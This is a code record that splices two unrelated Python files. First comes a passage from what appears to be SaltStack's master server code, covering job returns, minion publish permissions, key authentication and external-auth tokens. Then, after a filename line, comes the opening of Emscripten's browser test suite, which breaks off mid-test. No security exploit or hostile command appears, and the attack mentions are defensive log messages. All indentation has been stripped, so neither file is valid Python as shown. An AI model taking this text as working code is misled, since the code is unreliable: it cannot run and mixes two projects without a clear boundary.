elif isinstance(ndata['classes'], list):
ret[env] = ndata['classes']
else:
return ret
# Evaluate all configured master_tops interfaces
opts = {}
grains = {}
if 'opts' in load:
opts = load['opts']
if 'grains' in load['opts']:
grains = load['opts']['grains']
for fun in self.tops:
try:
ret.update(self.tops[fun](opts=opts, grains=grains))
except Exception as exc:
log.error(
('Top function {0} failed with error {1} for minion '
'{2}').format(fun, exc, load['id'])
)
# If anything happens in the top generation, log it and move on
pass
return ret
def _master_opts(self, load):
'''
Return the master options to the minion
'''
mopts = dict(self.opts)
file_roots = dict(mopts['file_roots'])
file_roots = {}
envs = self._file_envs()
for env in envs:
if not env in file_roots:
file_roots[env] = []
mopts['file_roots'] = file_roots
return mopts
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if 'id' not in load or 'grains' not in load or 'env' not in load:
return False
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load['env'])
data = pillar.compile_pillar()
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
return data
# This broken method makes the master die, pulling out until we can
# finish the masterstate system
# def _master_state(self, load):
# '''
# Call the master to compile a master side highstate
# '''
# if 'opts' not in load or 'grains' not in load:
# return False
# return salt.state.master_compile(
# self.opts,
# load['opts'],
# load['grains'],
# load['opts']['id'],
# load['opts']['environment'])
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
if 'id' not in load:
return False
if not 'events' in load:
if 'tag' not in load or 'data' not in load:
return False
if 'events' in load:
for event in load['events']:
self.event.fire_event(event, event['tag'])
else:
tag = load['tag']
self.event.fire_event(load, tag)
return True
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if 'return' not in load or 'jid' not in load or 'id' not in load:
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type'])
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid'])
if self.opts['master_ext_job_cache']:
fstr = '{0}.returner'.format(self.opts['master_ext_job_cache'])
self.mminion.returners[fstr](load)
return
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
hn_dir = os.path.join(jid_dir, load['id'])
if not os.path.isdir(hn_dir):
os.makedirs(hn_dir)
# Otherwise the minion has already returned this jid and it should
# be dropped
else:
log.error(
('An extra return was detected from minion {0}, please'
' verify the minion, this could be a replay'
' attack').format(load['id'])
)
return False
self.serial.dump(
load['return'],
# Use atomic open here to avoid the file being read before it's
# completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'return.p'), 'w+'
)
)
if 'out' in load:
self.serial.dump(
load['out'],
# Use atomic open here to avoid the file being read before
# it's completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'out.p'), 'w+'
)
)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if 'return' not in load or 'jid' not in load or 'id' not in load:
return None
# set the write flag
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id']))
try:
with salt.utils.fopen(wtag, 'w+') as fp_:
fp_.write('')
except (IOError, OSError):
log.error(
('Failed to commit the write tag for the syndic return,'
' are permissions correct in the cache dir:'
' {0}?').format(self.opts['cachedir']
)
)
return False
# Format individual return loads
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
if os.path.isfile(wtag):
os.remove(wtag)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
if 'peer_run' not in self.opts:
return {}
if not isinstance(self.opts['peer_run'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'id' not in clear_load\
or 'tok' not in clear_load:
return {}
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = set()
for match in self.opts['peer_run']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer_run'][match], list):
perms.update(self.opts['peer_run'][match])
good = False
for perm in perms:
if re.match(perm, clear_load['fun']):
good = True
if not good:
return {}
# Prepare the runner object
opts = {'fun': clear_load['fun'],
'arg': clear_load['arg'],
'id': clear_load['id'],
'doc': False,
'conf_file': self.opts['conf_file']}
opts.update(self.opts)
runner = salt.runner.Runner(opts)
return runner.run()
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return {}
if not isinstance(self.opts['peer'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'tgt' not in clear_load\
or 'ret' not in clear_load\
or 'tok' not in clear_load\
or 'id' not in clear_load:
return {}
# If the command will make a recursive publish don't run
if re.match('publish.*', clear_load['fun']):
return {}
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
good = self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
return {}
# Set up the publication payload
jid = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt_type': clear_load.get('tgt_type', 'glob'),
'tgt': clear_load['tgt'],
'jid': jid,
'ret': clear_load['ret'],
'id': clear_load['id'],
}
self.serial.dump(
load, salt.utils.fopen(
os.path.join(
salt.utils.jid_dir(
jid,
self.opts['cachedir'],
self.opts['hash_type']
),
'.load.p'
),
'w+')
)
# Save the load to the ext_job_cace if it is turned on
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
payload = {'enc': 'aes'}
expr_form = 'glob'
timeout = 5
if 'tmo' in clear_load:
try:
timeout = int(clear_load['tmo'])
except ValueError:
msg = 'Failed to parse timeout value: {0}'.format(
clear_load['tmo'])
log.warn(msg)
return {}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
expr_form = load['tgt_type']
if 'timeout' in clear_load:
timeout = clear_load['timeout']
# Encrypt!
payload['load'] = self.crypticle.dumps(load)
# Set the subscriber to the the jid before publishing the command
self.local.event.subscribe(load['jid'])
# Connect to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
log.info(('Publishing minion job: #{jid}, func: "{fun}", args:'
' "{arg}", target: "{tgt}"').format(**load))
pub_sock.send(self.serial.dumps(payload))
# Run the client get_returns method based on the form data sent
if 'form' in clear_load:
ret_form = clear_load['form']
else:
ret_form = 'clean'
if ret_form == 'clean':
try:
return self.local.get_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
finally:
self.local.event.unsubscribe(load['jid'])
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if context.closed is False:
context.term()
elif ret_form == 'full':
ret = self.local.get_full_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
ret['__jid__'] = jid
try:
return ret
finally:
self.local.event.unsubscribe(load['jid'])
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if context.closed is False:
context.term()
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
ret = getattr(self, func)(load)
else:
log.error(('Received function {0} which is unavailable on the '
'master, returning False').format(func))
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if not load.get('ver') == '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific aes key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(ret)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
def _send_cluster(self):
'''
Send the cluster data out
'''
log.debug('Sending out cluster data')
ret = self.local.cmd(self.opts['cluster_masters'],
'cluster.distrib',
self._cluster_load(),
0,
'list'
)
log.debug('Cluster distributed: {0}'.format(ret))
def _cluster_load(self):
'''
Generates the data sent to the cluster nodes.
'''
minions = {}
master_pem = ''
with salt.utils.fopen(self.opts['conf_file'], 'r') as fp_:
master_conf = fp_.read()
minion_dir = os.path.join(self.opts['pki_dir'], 'minions')
for host in os.listdir(minion_dir):
pub = os.path.join(minion_dir, host)
minions[host] = salt.utils.fopen(pub, 'r').read()
if self.opts['cluster_mode'] == 'full':
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
with salt.utils.fopen(master_pem_path) as fp_:
master_pem = fp_.read()
return [minions,
master_conf,
master_pem,
self.opts['conf_file']]
def _check_permissions(self, filename):
'''
check if the specified filename has correct permissions
'''
if 'os' in os.environ:
if os.environ['os'].startswith('Windows'):
return True
import pwd # after confirming not running Windows
import grp
try:
user = self.opts['user']
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except KeyError:
err = ('Failed to determine groups for user '
'{0}. The user is not available.\n').format(user)
log.error(err)
return False
fmode = os.stat(filename)
if os.getuid() == 0:
if fmode.st_uid == uid or not fmode.st_gid == gid:
return True
elif self.opts.get('permissive_pki_access', False) \
and fmode.st_gid in groups:
return True
else:
if stat.S_IWOTH & fmode.st_mode:
# don't allow others to write to the file
return False
# check group flags
if self.opts.get('permissive_pki_access', False) \
and stat.S_IWGRP & fmode.st_mode:
return True
elif stat.S_IWGRP & fmode.st_mode:
return False
# check if writable by group or other
if not (stat.S_IWGRP & fmode.st_mode or
stat.S_IWOTH & fmode.st_mode):
return True
return False
def _check_autosign(self, keyid):
'''
Checks if the specified keyid should automatically be signed.
'''
if self.opts['auto_accept']:
return True
autosign_file = self.opts.get("autosign_file", None)
if not autosign_file or not os.path.exists(autosign_file):
return False
if not self._check_permissions(autosign_file):
message = "Wrong permissions for {0}, ignoring content"
log.warn(message.format(autosign_file))
return False
with salt.utils.fopen(autosign_file, 'r') as fp_:
for line in fp_:
line = line.strip()
if line.startswith('#'):
continue
if line == keyid:
return True
if fnmatch.fnmatch(keyid, line):
return True
try:
if re.match(line, keyid):
return True
except re.error:
message = ('{0} is not a valid regular expression, '
'ignoring line in {1}')
log.warn(message.format(line, autosign_file))
continue
return False
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the aes key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
'''
# 0. Check for max open files
# 1. Verify that the key we are receiving matches the stored key
# 2. Store the key if it is not there
# 3. make an rsa key with the pub key
# 4. encrypt the aes key as an encrypted salt.payload
# 5. package the return and return it
salt.utils.verify.check_max_open_files(self.opts)
log.info('Authentication request from {id}'.format(**load))
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn):
# The key has been accepted check it
if not salt.utils.fopen(pubfn, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif not os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This is a new key, stick it in pre
log.info(
'New public key placed in pending for {id}'.format(**load)
)
with salt.utils.fopen(pubfn_pend, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': True}}
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This key is in pending, if it is the same key ret True, else
# ret False
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key '
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': True}}
elif os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This key is in pending, if it is the same key auto accept it
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
elif not os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This is a new key and it should be automatically be accepted
pass
else:
# Something happened that I have not accounted for, FAIL!
log.warn('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError, err:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, err))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port'],
}
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name],
clear_load['fun'])
if not good:
return ''
return self.wheel_.call_func(
clear_load.pop('fun'),
**clear_load)
except Exception as exc:
log.error(
('Exception occurred in the wheel system: {0}'
).format(exc)
)
return ''
def mk_token(self, clear_load):
'''
Create aand return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
('Exception occured while authenticating: {0}'
).format(exc)
)
return ''
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# Check for external auth calls
if extra.get('token', False):
# A token was passwd, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
('Exception occured when generating auth token: {0}'
).format(exc)
)
return ''
if not token:
return ''
if not token['eauth'] in self.opts['external_auth']:
return ''
if not token['name'] in self.opts['external_auth'][token['eauth']]:
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
elif 'eauth' in extra:
if not extra['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(extra)
if not name in self.opts['external_auth'][extra['eauth']]:
return ''
if not self.loadauth.time_auth(extra):
return ''
except Exception as exc:
log.error(
('Exception occured while authenticating: {0}'
).format(exc)
)
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][extra['eauth']][name],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == 'root':
if not clear_load.pop('key') == self.key.get(self.opts.get('user', 'root')):
return ''
elif clear_load['user'] == getpass.getuser():
if not clear_load.pop('key') == self.key.get(clear_load['user']):
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if not clear_load.pop('key') == self.key[clear_load['user']]:
return ''
if not clear_load['user'] in self.opts['client_acl']:
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
else:
return ''
else:
if not clear_load.pop('key') == self.key[getpass.getuser()]:
return ''
if not clear_load['jid']:
clear_load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
jid_dir = salt.utils.jid_dir(
clear_load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
# Verify the jid dir
if not os.path.isdir(jid_dir):
os.makedirs(jid_dir)
# Save the invocation information
self.serial.dump(
clear_load,
salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+')
)
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(
'User {user} Published command {fun} with jid {jid}'.format(
**clear_load
)
)
load['user'] = clear_load['user']
else:
log.info(
'Published command {fun} with jid {jid}'.format(
**clear_load
)
)
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
pub_sock.send(self.serial.dumps(payload))
minions = self.ckminions.check_minions(
load['tgt'],
load.get('tgt_type', 'glob')
)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_fastcomp, no_wasm_backend, create_test_file, parameterized, ensure_dir
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
if sys.version_info.major == 2:
from urllib import urlopen
else:
from urllib.request import urlopen
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps. emscripten_loadSourceMap looks at $HTML.map but it should be $NAME.wasm.map.
src = 'src.cpp'
